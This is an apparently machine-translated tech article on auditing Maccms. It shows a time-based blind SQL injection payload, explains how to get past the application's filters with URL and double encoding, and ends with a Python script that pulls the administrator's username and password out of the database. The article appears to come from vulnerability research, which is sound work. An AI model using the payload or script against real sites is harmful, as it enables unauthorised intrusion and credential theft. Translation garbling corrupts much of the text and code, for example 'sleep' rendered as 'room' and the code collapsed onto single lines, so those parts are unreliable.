Shulou(Shulou.com)05/31 Report--

Maccms SQL injection analysis and how to write the script, for this problem, this article introduces the corresponding analysis and solutions in detail, hoping to help more partners who want to solve this problem to find a more simple and easy way.

Preface of 0x01

A friend asked me to study the code audit of maccms. It was interesting to encounter this injection vulnerability, so I wrote an analysis article here.

0x02 environment

Web: phpstudy

System: Windows 10 X64

Browser: Firefox Quantum

Python version: 2.7

Tools: JetBrains PhpStorm 2018.1.6 x64, Seay code audit tool

It is also very easy to build this program, and it is also achieved in one step.

Recurrence of 0x03 vulnerabilities

1. First, add a piece of data to the background of the program.

two。 When we execute our payload, we can see that the jump of the website has been delayed for more than 3 seconds. Url: http://sb.com/index.php?m=vod-searchpost:wd=))||if((selectascii(length((select(m_name)\`\`from(mac_manager))))=53),(\`sleep\`(3)),0)#%25%35%63

3. Because it is a blind injection, the account password of the administrator is analyzed below.

Analysis of 0x04 SQL execution process

It is also a benefit to learn about code auditing by figuring out how sql performs a process and then analyzing how it causes SQL injection.

Because it is dynamic analysis, will not install the debugging environment, please go to this article to complete the installation of https://getpass.cn/2018/04/10/Breakpoint%20debugging%20with%20phpstorm+xdebug/ step by step

Phpstorm turns on this option, which means that if you break at the first line of the current script file, I won't drop the breakpoint and follow the process it executes.

3. We first casually enter a little bit of data access and then break in the first line of index.php 4. F8 go down to line 14 F7 and follow in. Then F8 goes straight down, and you can see that the interception rule goes to the filtering of POST where F7 goes into the arr_foreach function to check whether the passed value is an array, returns the original data if not, and then uses the urldecode function URL to decode it. Finally, match the passed values of wd and test, and jump to the error message if there are characters in the interception rule. For example, if you type wd=/**/, it will be blocked because / * / exists in the intercepted regular expression. 5. When you come out, you will go to $m = be ('get','m'); here, this is just filtering the addslashes function for the vod-search passed by m 6. I am afraid that the article is too long, some unnecessary code to read carefully on the line, F8 all the way to the next week, go to line 37 F7, because we passed the parameter is vod, so it will include the vod.php file and execute. 7. Because our parameter is search, we will come here, and we can go in and see the execution process of F7. Here, it will be decoded by the urldecode function until it cannot be decoded, then filtered by the StopAttack method just now and finally replaced by the htmlEncode method 8. After jumping out of the vod.php file, F8 walks here, and F7 goes in to see the process executed by SQL. Go all the way until the value of markname is vod, then don't worry about F8. If you go in F7, you can see that the execution of SQL is here. The following is the statement SELECT count (*) FROM {pre} vod WHERE 1 scene 1 AND d_hide=0 AND d_type > 0 and d_type not in (0) and d_usergroup in (0) AND (instr) > 0 or instr) > 0 or instr (dazzling subname1)

0x05 vulnerability analysis

The SQL execution process is analyzed above, and how this constitutes SQL injection is analyzed below.

Just skipped here, file location: inc/common/template.php, you can see that the passed P ["wd"] value assigned to $lp ['wd']. two。 Looking down at line 753-755, you can see that our values are put in here and then sent to GetOne for execution.

If (! empty ($lp ['wd']) {$where. =' AND (instr (d_name,\'. $lp ['wd'].) > 0 or instr (d_subname,\'. $lp ['wd'].) > 0 or instr (d_starring,\'. $lp ['wd'].) > 0)';}

3. The construction of the statement, only in the middle is the execution of the statement, the previous sentence is to close single quotation marks, followed by comments. If it is not clear here, you can use MySQL monitoring software to find out step by step.

AND d_hide=0 AND d_type > 0 and d_type not in (0) and d_usergroup in (0) AND (instr (dumbname mac_manager')) | | if ((select ascii (length ((select (m_name) from (mac_manager) = 53), (`room` (3), 0) #\') > 0 or instr (dumbsubamejin`) | if (select ascii (length (select (m_name) from (mac_manager) = 53), (`room` (3)) 0) #\') > 0 or instr) | | if ((select ascii (length ((select (m_name) from (mac_manager) = 53), (`room` (5)), 0) #\') > 0) 4. But if dangerous characters are detected if you put the statement directly on it, it mainly matches our space connection here, then we can replace it with the alias as'', or we can omit the as and use it directly. The usage of the alias is given in the reference at the end of the article.

5. We execute it again and check it with the Mysql monitoring software of Seay's code audit tool, and our spaces and the following\ are escaped.

Remember our chkSql method? First, urldecode decoding is performed, then StopAttack matching, and finally htmlEncode encoding. Finally, there is an addslashes function filter in the Be method, which causes the following\ escape to\\. HtmlEncode again escapes to the preceding space.

Function chkSql ($s) {global $getfilter;if (empty ($s)) {return ";} $dudes break; ($s); return htmlEncode ($s); return htmlEncode ($s);}

6. Here we can use URL coding to bypass htmlEncode. For details, you can see the HTML URL coding table and so on. The following\ can use URL encoding to bypass% 5c or double encoding% 25% 35% 63.

7. Then the payload we constructed is as follows. The function is to query the length of the administrator account field wd=) | | if ((selectascii ((select (m_name) from (mac_manager) = 53), (sleep (3)), 0) #% 5c``

Writing blind injection script by 0x06

Of course, blind injection is generally not manual, SQLMAP sometimes encounter special is to write their own injection script, I do not interpret the meaning of the specific code, I can combine the knowledge of Python and MySQL to understand.

#! / usr/bin/python#-*-coding:utf-8-*-# author:F0rmatimport requestsimport timedict = "1234567890qwertyuiopasdfghjklzxcvbnm{} QWERTYUIOPASDFGHJKLZXCVBNM @.? "UserName=''UserPass=''UserName_length=0url=' http://sb.com/'url = url + r'/index.php?m=vod-search'def main (): global UserName global url for i in range (30): startTime = time.time () sql =") | | if ((selectascii ((select (m_name) ``from (mac_manager) = {}), (`room` (3)) 0) #% 25% 35% 63 ".format (ord (str (I)) data= {'wd': sql} response = requests.post (url, data=data) # send request if time.time ()-startTime > 3: UserName_length = I print UserName_length break for num in range (1) UserName_length + 1): for i in dict: # traversal fetches characters startTime = time.time () sql = ") | | if ((selectascii (substr ((select (m_name) ``from (mac_manager)), {}, 1)) = {}), (`room` (3), 0) #% 25% 35% 63" .format (str (num)) Ord (I)) data = {'wd': sql} response = requests.post (url Data=data) # send request print data if time.time ()-startTime > 3: UserName + = i break global UserPass for num in range (32): for i in dict: # traversal fetch character startTime = time.time () sql = ")) | if ((selectascii (substr ((select (m_password) ``from (mac_manager), {} )) = {}), (`room` (3)), 0) #% 25% 35% 63 ".format (str (num), ord (I)) data = {'wd': sql} response = requests.post (url) Data=data) # send request print data if time.time ()-startTime > 3: UserPass + = i break print 'username:'+UserName,'password:'+UserPassif _ _ name__ =' _ _ main__': main () the answers to the questions about Maccms SQL injection analysis and how to write scripts are shared here I hope the above content can help you to a certain extent, if you still have a lot of doubts to be solved, you can follow the industry information channel to learn more related knowledge.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.